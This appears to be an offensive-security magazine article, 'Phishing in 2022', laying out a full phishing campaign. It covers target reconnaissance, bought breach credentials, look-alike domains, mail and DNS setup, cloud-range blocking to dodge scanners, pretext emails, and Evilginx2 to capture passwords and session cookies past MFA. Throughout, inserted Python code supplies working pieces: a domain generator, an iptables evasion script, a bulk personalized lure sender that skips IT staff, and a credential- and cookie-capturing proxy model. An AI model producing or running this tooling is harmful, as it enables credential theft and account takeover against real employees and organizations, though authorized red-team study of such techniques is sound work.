Phishing in 2022

by Jeff Barron

Phishing remains the most effective way to penetrate an organization from the outside.

The Verizon 2021 Data Breach Investigations Report (DBIR) puts the median click rate on phishing links at 3.5 percent.  That is a median; some organizations had click-through rates above 40 percent.  Oddly enough, even if you ignore every tip in this article and your phish lands in spam, you still have a chance of a click.  Phishing is alive and well in 2022.

In this article, I will show you how to do it.  No more cloning websites.  Two-factor authentication?  We can beat that.

O.K., so you have your target?  Well, there is a bunch of OSINT to be done before you can even set up your domain.  A sock-puppet account on LinkedIn is really good for mapping out relationships inside the target organization: who is in IT, who reports to whom, which vendors they work with.  Other social media can reveal useful things about the target as well, but I mostly stay with LinkedIn.

Using the website phonebook.cz, I discovered 307 email addresses for 2600.com.  Now, I have no interest in or intention of phishing the good folks at 2600 or anyone who isn't paying me to do so; it simply shows how quickly phonebook.cz turns a bare domain name into a list of addresses.  Another commonly used tool is theHarvester, which is available on GitHub and packaged with Kali.

O.K., so you've got emails and maybe some pretext material from your OSINT.  This is the point where you should search for breached credentials for your target.  If you haven't been collecting breach dumps and don't know anyone who has, then I recommend an awesome service: Dehashed.  An account at dehashed.com costs $5 and is well worth it; you can also check whether breached credentials exist for a domain without paying anything.  Once you have the credentials, it's time to try them against the in-scope services.  If one of them lets you send email as someone inside the organization, that adds a lot of credibility to your phish.

It's time to register a domain.

The first thing we want to do is examine the target's domain name.  Can we get the same name under a different TLD?  Using dnstwist (there is a hosted version at dnstwist.it), one can see that there are some shady 2600 look-alikes such as 2600.cn and 2600.cu that are likely unrelated to 2600.com.  You may get lucky and find the .org or .net version of your target unregistered.  It is also worth checking for expired domains, which come with some age and reputation already attached; you can find those on expireddomains.net.
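To show what dnstwist is doing when it lists those look-alikes, here is a small candidate generator in the same spirit.  It is an added example for this article, not dnstwist's code; the TLD list, the homoglyph table and the "mail/login/sso" word list are assumptions you would extend for a real engagement, and it goes slightly beyond the article by also producing the "2600-login.com" style names that phishing domains are usually built from.

```python
"""Look-alike domain candidates for a target, in the spirit of dnstwist.
Added example for this article; it is not dnstwist's code, and the TLD and
homoglyph tables are small assumptions you would extend for a real engagement."""

# Assumption: alternative TLDs worth checking for the same name.
ALT_TLDS = ["org", "net", "co", "io", "info", "cn", "cu"]
# Assumption: substitutions that survive a quick glance at an address bar.
HOMOGLYPHS = {"o": ["0"], "0": ["o"], "l": ["1", "i"], "i": ["l", "1"], "1": ["l"],
              "e": ["3"], "a": ["4"], "s": ["5"], "m": ["rn"], "w": ["vv"]}
# Assumption: words people expect to see next to a company name.
ADDITIONS = ["mail", "login", "sso", "hr", "it"]

def split_domain(domain):
    """'2600.com' -> ('2600', 'com'); rejects bare names."""
    name, _, tld = domain.lower().strip().rpartition(".")
    if not name or not tld:
        raise ValueError(f"expected name.tld, got {domain!r}")
    return name, tld

def tld_swaps(domain):
    name, tld = split_domain(domain)
    return [f"{name}.{t}" for t in ALT_TLDS if t != tld]

def homoglyphs(domain):
    name, tld = split_domain(domain)
    out = set()
    for i, ch in enumerate(name):
        for sub in HOMOGLYPHS.get(ch, []):
            out.add(f"{name[:i]}{sub}{name[i + 1:]}.{tld}")
    return sorted(out)

def omissions(domain):
    """Drop one character; dnstwist calls this 'omission'."""
    name, tld = split_domain(domain)
    if len(name) < 2:
        return []
    return sorted({f"{name[:i]}{name[i + 1:]}.{tld}" for i in range(len(name))})

def additions(domain):
    """'2600.com' -> '2600-mail.com', '2600mail.com', ...; the domain you
    actually send from usually comes from this list rather than from a typo."""
    name, tld = split_domain(domain)
    out = []
    for word in ADDITIONS:
        out += [f"{name}-{word}.{tld}", f"{name}{word}.{tld}"]
    return out

def candidates(domain):
    """All generators, de-duplicated, tagged with the technique that produced them."""
    tagged = {}
    for tag, gen in (("tld", tld_swaps), ("homoglyph", homoglyphs),
                     ("omission", omissions), ("addition", additions)):
        for cand in gen(domain):
            tagged.setdefault(cand, tag)
    return tagged

if __name__ == "__main__":
    for cand, tag in sorted(candidates("2600.com").items()):
        print(f"{tag:10} {cand}")   # feed these to whois/dnstwist to see which are free
```

The output is just a list of names; the next step is still to check each one against whois (or let dnstwist do it) to see which are unregistered.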

As far as registrars go, I don't really have an opinion; the cheaper the better.  I've used Namecheap in the past and it did the job.  After you register the domain, sit on it for at least seven days.  A domain that is only days old is a strong spam signal, and if your phish goes out before then it is likely to land straight in the spam folder.

The next thing you'll want is a VPS to host the domain.  I use DigitalOcean droplets, but there are probably better and cheaper options out there.  On your Linux VPS, install Postfix and Mailutils (mailutils is the package name on Debian/Ubuntu-based distros).

Setting up Postfix is out of the scope of this article.  I'll include an awesome reference at the end of this article for those who want to learn how to do it.  Essentially, it boils down to adding your domain to three files (/etc/postfix/transport, /etc/postfix/virtual_domains, and /etc/postfix/virtual_regexp).  Remember to set /etc/hostname and /etc/mailname properly as well, since Postfix announces that hostname to every server it talks to.

We need DNS entries!

You'll want to configure your DNS to have an "A" record pointing at the IP address of your VPS.  You'll also want an "MX" record pointing at mail.evildomain.tld, which needs its own "A" record.  Unfortunately, there is still more DNS work to do.  We must have SPF, DMARC, and DKIM records for our shady domain!  This is fairly easy to do and, again, I point you to the first reference at the bottom of this article for the details from HackTricks.  After you have set up SPF, DMARC, and DKIM, you also need a reverse DNS entry, the rDNS "PTR" record, that resolves the VPS's IP address back to the mail hostname (the same name Postfix announces).  That one is set at the VPS provider, not the registrar.
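The record set above is easy to get subtly wrong (a PTR that points at the bare domain instead of the mail host, two SPF records, a DKIM record with an empty key), so here is the checklist as code: one function that writes out the records to create, and one that checks a set of resolver answers against them.  This is an added example for this article, not from HackTricks or the author.  The answers dictionary stands in for what dig returns, keyed by (name, record type); evildomain.tld, 203.0.113.10, the selector s1 and the placeholder DKIM key are all constructed.

```python
"""The DNS a sending domain needs, as data you can diff against what the
resolver actually returns. Added example for this article (not from
HackTricks or the author); 'answers' stands in for dig output, keyed by
(name, record type), and every name, address and key below is constructed."""
import ipaddress
import re

def expected_records(domain, mail_host, ip, dkim_selector, dkim_pubkey_b64):
    """The record set to create. The DKIM public key is whatever your signer
    generated (opendkim-genkey, for example); it is passed in, not made here."""
    rev = ipaddress.ip_address(ip).reverse_pointer        # 10.113.0.203.in-addr.arpa
    return {
        (domain, "A"): [ip],
        (mail_host, "A"): [ip],                            # the MX target needs its own A
        (domain, "MX"): [f"10 {mail_host}."],
        (domain, "TXT"): [f"v=spf1 mx a ip4:{ip} -all"],
        (f"_dmarc.{domain}", "TXT"): [f"v=DMARC1; p=none; rua=mailto:dmarc@{domain}"],
        (f"{dkim_selector}._domainkey.{domain}", "TXT"):
            [f"v=DKIM1; k=rsa; p={dkim_pubkey_b64}"],
        (rev, "PTR"): [f"{mail_host}."],                   # set at the VPS provider, not the registrar
    }

def _txt(answers, name, prefix):
    return [t for t in answers.get((name, "TXT"), []) if t.lower().startswith(prefix)]

def check_mail_dns(domain, mail_host, ip, dkim_selector, answers):
    """Return a list of problems; empty means the checklist in the article is met."""
    problems = []
    if ip not in answers.get((domain, "A"), []):
        problems.append(f"A {domain} does not point at {ip}")
    if ip not in answers.get((mail_host, "A"), []):
        problems.append(f"A {mail_host} does not point at {ip}")
    if not any(mail_host in mx for mx in answers.get((domain, "MX"), [])):
        problems.append(f"MX {domain} does not name {mail_host}")
    spf = _txt(answers, domain, "v=spf1")
    if len(spf) != 1:                                      # two SPF records is a permerror
        problems.append(f"expected exactly one SPF record on {domain}, found {len(spf)}")
    else:
        terms = spf[0].split()
        if not any(t in ("mx", "a", f"ip4:{ip}") for t in terms):
            problems.append("SPF does not authorize the sending host")
        if terms[-1] not in ("-all", "~all"):
            problems.append("SPF should end with -all or ~all")
    dmarc = _txt(answers, f"_dmarc.{domain}", "v=dmarc1")
    if not dmarc or not re.search(r"(^|;)\s*p=(none|quarantine|reject)", dmarc[0]):
        problems.append("DMARC record missing or has no p= policy")
    dkim = _txt(answers, f"{dkim_selector}._domainkey.{domain}", "v=dkim1")
    if not dkim or not re.search(r"(^|;)\s*p=[A-Za-z0-9+/=]+", dkim[0]):
        problems.append("DKIM record missing or has an empty public key")
    rev = ipaddress.ip_address(ip).reverse_pointer
    if mail_host not in [p.rstrip(".") for p in answers.get((rev, "PTR"), [])]:
        problems.append(f"PTR for {ip} does not resolve to {mail_host}")
    return problems

if __name__ == "__main__":
    want = expected_records("evildomain.tld", "mail.evildomain.tld", "203.0.113.10",
                            "s1", "PLACEHOLDERBASE64KEY")
    for (name, rtype), values in want.items():
        print(f"{name:40} {rtype:4} {values[0]}")
    # Fill 'answers' from dig output once the records have propagated:
    print(check_mail_dns("evildomain.tld", "mail.evildomain.tld", "203.0.113.10", "s1", want))
```

The DMARC policy is p=none because the goal here is only that a valid record exists; any of the three policies satisfies the check.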

So we have finished our setup.

It's time to test our mail and see how it fares with spam filters.  HackTricks recommends mail-tester.com: it hands you a one-time address, scores the message you send to it out of 10, and itemizes what it didn't like (SPF, DKIM, DMARC, rDNS, blocklists).  You can send to it and similar services from the command line with Mailutils:

$ echo "my test message" | mail -s "My test message" generatedAddress@mail-tester.com

After testing the email, there is one more thing I do on the VPS.  I use iptables to block the published address ranges of AWS, Azure, and GCP.  I don't have good data on this, but I strongly believe it lets my evil domains live longer without getting burned, because many of the scanners that threat intelligence companies point at the Internet to find domains like ours live in those clouds.  Mind that the same rules block anything legitimate hosted there, including the box you administer the VPS from if it happens to be a cloud instance, so carve out what you need.
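The providers publish their ranges as JSON, so the block can be built from the feeds rather than a stale copy-paste.  The following is an added example for this article, not the author's own rules.  The parsers follow the feed layouts as published at the time of writing (AWS at https://ip-ranges.amazonaws.com/ip-ranges.json, GCP at https://www.gstatic.com/ipranges/cloud.json, and Azure's downloadable ServiceTags_Public JSON); the three feeds in the block are constructed samples in those layouts, not real downloads, and the 203.0.113.0/24 carve-out is an assumed admin network.  Output is a list of ipset/iptables commands.

```python
"""Block the cloud providers' published address ranges with ipset + iptables.
Added example for this article (not the author's own rules). The parsers
follow the feed layouts as published at the time of writing; the three feeds
below are constructed samples in those layouts, not real downloads. IPv4 only,
to keep the ipset type simple."""
import ipaddress
import json

SET_NAME = "cloudblock"

# Constructed samples (the real feeds are tens of thousands of prefixes).
AWS_SAMPLE = json.loads('{"syncToken": "0", "prefixes": ['
    '{"ip_prefix": "3.5.140.0/22", "region": "ap-northeast-2", "service": "AMAZON"},'
    '{"ip_prefix": "3.5.140.0/24", "region": "ap-northeast-2", "service": "S3"}]}')
GCP_SAMPLE = json.loads('{"prefixes": ['
    '{"ipv4Prefix": "34.80.0.0/15", "service": "Google Cloud", "scope": "asia-east1"},'
    '{"ipv6Prefix": "2600:1900::/28", "service": "Google Cloud", "scope": "global"}]}')
AZURE_SAMPLE = json.loads('{"cloud": "Public", "values": ['
    '{"name": "AzureCloud", "properties": {"addressPrefixes": ["13.64.0.0/11", "2603:1000::/25"]}},'
    '{"name": "AzureCloud.eastus", "properties": {"addressPrefixes": ["13.64.0.0/11"]}}]}')

def aws_prefixes(doc):
    return [p["ip_prefix"] for p in doc.get("prefixes", [])]

def gcp_prefixes(doc):
    return [p["ipv4Prefix"] for p in doc.get("prefixes", []) if "ipv4Prefix" in p]

def azure_prefixes(doc):
    # "AzureCloud" is the umbrella tag; the per-region tags repeat its ranges.
    return [p for tag in doc.get("values", []) if tag.get("name") == "AzureCloud"
            for p in tag["properties"]["addressPrefixes"]]

def build_blocklist(prefixes, allow=()):
    """Collapse overlapping prefixes, then carve out 'allow' (e.g. the range your
    own admin box lives in, so the rule cannot lock you out)."""
    nets = [ipaddress.ip_network(p) for p in prefixes]
    nets = sorted(ipaddress.collapse_addresses(n for n in nets if n.version == 4))
    for keep in (ipaddress.ip_network(a) for a in allow):
        carved = []
        for net in nets:
            if net.subnet_of(keep):
                continue                                  # wholly allowed, drop it
            if keep.subnet_of(net):
                carved.extend(net.address_exclude(keep))  # punch a hole in it
            else:
                carved.append(net)
        nets = sorted(carved)
    return nets

def iptables_script(nets, set_name=SET_NAME):
    """Shell lines to apply the set; '-exist' and '-C' make it safe to re-run."""
    lines = [f"ipset create {set_name} hash:net -exist", f"ipset flush {set_name}"]
    lines += [f"ipset add {set_name} {n} -exist" for n in nets]
    lines.append(f"iptables -C INPUT -m set --match-set {set_name} src -j DROP 2>/dev/null"
                 f" || iptables -I INPUT -m set --match-set {set_name} src -j DROP")
    return lines

def script_from_feeds(aws, gcp, azure, allow=()):
    prefixes = aws_prefixes(aws) + gcp_prefixes(gcp) + azure_prefixes(azure)
    return iptables_script(build_blocklist(prefixes, allow))

if __name__ == "__main__":
    # Assumption: 203.0.113.0/24 is the network you administer the VPS from.
    print("\n".join(script_from_feeds(AWS_SAMPLE, GCP_SAMPLE, AZURE_SAMPLE,
                                      allow=["203.0.113.0/24"])))
```

Pipe the printed lines into a root shell on the VPS after downloading the real feeds; re-run it on a schedule, since the ranges change.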

Pretexts!

So what are we going to say to get the user to click?  I have two trusty pretexts that are effective.  The first: "Hey, I'm (insert name of IT person found on LinkedIn) and I noticed some unusual activity on your Office 365 account.  Would you help me out and check and see if this is you?  Thank you so much! (insert link)".  The second: "Hey, we are resetting all passwords as we integrate our new vendors.  Please go to (insert link) and follow the prompts as soon as possible.  Thanks!  (insert name of IT person you found on LinkedIn)".

It's good to personalize the email as much as possible and open with "Hi (name of victim)," but that can be tedious, so I usually just make it generic for all and send the phish to everyone (except the IT department, who are the most likely to recognize the pretext and raise the alarm).
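The tedium goes away if the batch is generated from a target list, which is what the following added example does (it is not the author's tooling).  It fills the first pretext in for each target, skips the IT department, and hands the batch to the local Postfix.  The CSV, the IT person's name, the sending address and the lure URL are constructed; sending is implemented but not called, so the block runs offline.

```python
"""One message per target from the pretext above, with the name filled in and
the IT department skipped. Added example for this article, not the author's
tooling; the target list, sender and lure URL are constructed. Sending is
left to Postfix on the VPS via smtplib and is not run here."""
import csv
import io
from email.message import EmailMessage
from email.utils import formataddr

PRETEXT = """Hi {first},

I'm {it_name} from IT and I noticed some unusual activity on your Office 365
account. Would you help me out and check and see if this is you?

{lure}

Thank you so much!
{it_name}
"""

# Constructed target list: addresses from phonebook.cz/theHarvester, names and
# departments filled in from LinkedIn.
TARGETS_CSV = """email,first,last,department
alice@example.com,Alice,Adams,Finance
bob@example.com,Bob,Brown,IT
carol@example.com,Carol,Clark,Sales
"""

def load_targets(csv_text, skip_departments=("IT",)):
    """Everyone except the teams most likely to recognize the pretext."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [r for r in rows if r["department"] not in skip_departments]

def build_messages(targets, it_name, sender_addr, lure_url, subject):
    """lure_url is the link Evilginx2 generated; whether a per-target tag can be
    appended depends on the phishlet, so the same link goes to everyone here."""
    msgs = []
    for t in targets:
        msg = EmailMessage()
        msg["From"] = formataddr((it_name, sender_addr))
        msg["To"] = formataddr((f"{t['first']} {t['last']}", t["email"]))
        msg["Subject"] = subject
        msg.set_content(PRETEXT.format(first=t["first"], it_name=it_name, lure=lure_url))
        msgs.append(msg)
    return msgs

def send_all(msgs, smtp_host="localhost"):
    """Hand the batch to the local Postfix; not called in the demo below."""
    import smtplib
    with smtplib.SMTP(smtp_host) as smtp:
        for m in msgs:
            smtp.send_message(m)

if __name__ == "__main__":
    batch = build_messages(load_targets(TARGETS_CSV), "Pat Smith",
                           "pat.smith@evildomain.tld",
                           "https://login.evildomain.tld/abc123",
                           "Unusual sign-in activity")
    for m in batch:
        print(m["To"], "|", m["Subject"])
```

Send a copy to mail-tester.com through the same path first; a personalized body that scores badly there will score badly at the target too.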

At this point, we have most of what we need to begin this engagement.

But what are we linking to?  We haven't cloned any websites!  The reason is that we are going to use Evilginx2 instead.

From the GitHub page, the project self describes as follows: "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication."

Evilginx2 is amazing.  Imagine our victim uses Office 365.  We generate a link with Evilginx2; when the user clicks it, the request lands on our VPS, which forwards it to the real Office 365 login and relays the response back, rewriting hostnames so the browser keeps talking to us.  So on one side we have the victim, in the middle is our VPS, and on the other side is Office 365.  It looks identical because it is the actual site, fetched live.

Because the VPS sits in the middle of the session, it sees not just the password but also whatever the real site sends back after the victim approves the push notification or types the one-time code: the session cookie.  Since we are proxying the connection, that cookie lands in our logs too, and importing it into our own browser gives us a logged-in session with no MFA prompt.  This works against push, SMS and TOTP-style factors; it does not work against FIDO2/WebAuthn security keys, because the authenticator signs the origin it actually sees (our domain, not the real one) and the real site rejects the result.
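To make the mechanism concrete, here is a reduced model of the two things the proxy does on every exchange: rewrite the request so the real site sees its own name, and rewrite the response so cookies, redirects and links point back at us, copying out the session cookies as they pass.  This is an added example for this article, not Evilginx2's code (Evilginx2 drives the same operations from per-site phishlet definitions and rewrites a great deal more).  The hostnames, the cookie names, the form field names and the two-step sample exchange are all constructed.

```python
"""A reduced model of the proxy in the middle. Added example for this article;
it is not Evilginx2's code. Hostnames, cookie names and the sample exchange
are constructed."""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

REAL_HOST = "login.example-cloud.com"     # the genuine identity provider (constructed)
PHISH_HOST = "login.evildomain.tld"       # our proxy's hostname (constructed)
SESSION_COOKIES = {"ESTSAUTH", "SignInStateCookie"}   # what a logged-in session consists of (constructed)
CRED_FIELDS = ("login", "passwd")         # fields the login POST carries (constructed)

def rewrite_outbound_request(headers):
    """Browser -> proxy -> real site. The real site must see its own name, and
    we drop Accept-Encoding so the response body comes back as rewritable text."""
    out = []
    for name, value in headers:
        key = name.lower()
        if key == "accept-encoding":
            continue
        if key in ("host", "origin", "referer"):
            value = value.replace(PHISH_HOST, REAL_HOST)
        out.append((name, value))
    return out

def capture_credentials(body):
    """The login POST passes through us in the clear; keep the interesting fields."""
    form = parse_qs(body)
    return {k: form[k][0] for k in CRED_FIELDS if k in form}

def rewrite_response(headers, body):
    """Real site -> proxy -> browser. Cookies are re-homed to our host so the
    browser sends them back to us; redirects and absolute URLs in the body are
    pointed at us too. Session cookies are copied out on the way past."""
    out, captured = [], {}
    for name, value in headers:
        key = name.lower()
        if key == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            for cname, morsel in jar.items():
                if cname in SESSION_COOKIES:
                    captured[cname] = morsel.value
                morsel["domain"] = PHISH_HOST
                value = morsel.OutputString()
        elif key == "location":
            value = value.replace(REAL_HOST, PHISH_HOST)
        out.append((name, value))
    return out, body.replace(REAL_HOST, PHISH_HOST), captured

def proxy_exchange(req_headers, req_body, resp_headers, resp_body, session):
    """One request/response pair through the proxy. 'session' accumulates
    captured cookies across exchanges; the MFA step happens on the real site,
    and the cookie it results in is just another Set-Cookie flowing past us."""
    creds = capture_credentials(req_body)
    upstream = rewrite_outbound_request(req_headers)      # what we would send to REAL_HOST
    out_headers, out_body, got = rewrite_response(resp_headers, resp_body)
    session.update(got)
    complete = SESSION_COOKIES.issubset(session)
    return creds, upstream, out_headers, out_body, complete

if __name__ == "__main__":
    session = {}
    req = [("Host", PHISH_HOST), ("Origin", f"https://{PHISH_HOST}"), ("Accept-Encoding", "gzip, br")]
    # Step 1: password POST; the real site answers with a redirect into its MFA page.
    creds, _, _, _, done = proxy_exchange(
        req, "login=alice%40example.com&passwd=hunter2",
        [("Set-Cookie", f"SignInStateCookie=1; Domain=.{REAL_HOST}; Path=/; Secure"),
         ("Location", f"https://{REAL_HOST}/mfa")],
        f'<form action="https://{REAL_HOST}/mfa">', session)
    print("credentials:", creds, "session complete:", done)
    # Step 2: the victim approves the push; the real site sets the session cookie.
    _, _, _, _, done = proxy_exchange(
        req, "", [("Set-Cookie", f"ESTSAUTH=tok; Domain=.{REAL_HOST}; Path=/; Secure; HttpOnly")],
        "", session)
    print("captured session:", session, "session complete:", done)
```

Only once every cookie in SESSION_COOKIES has been seen is the session worth exporting; that is the moment Evilginx2 reports a captured session, and it comes after the MFA step, not before.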

Evilginx2 also obtains TLS certificates for the phishing hostnames automatically (via Let's Encrypt) when you run it, so the lure is served over HTTPS with a valid padlock.  I prefer running it from Docker as it's quick and easy.  The Evilginx2 GitHub page has great videos explaining how to use it and how it works under the hood.

All right, so if you've gotten this far, you now have everything you need to conduct a modern, MFA-bypassing, phishing attack.  Please use this power for good.  I recommend reading through the references for more detailed information on some of the areas I glossed over.

If you want to talk more about offensive security, please feel free to shoot me an email.

A big shout-out and thank you to the folks who helped teach me this stuff: Critical Path Security, Black Hills Infosec, the amazing folks at HackTricks, Kuba Gretzky of the Evilginx2 project, and 2600 Magazine, which inspired a 12-year-old version of me to build a Red Box.

So long, and thanks for all the phish.

References
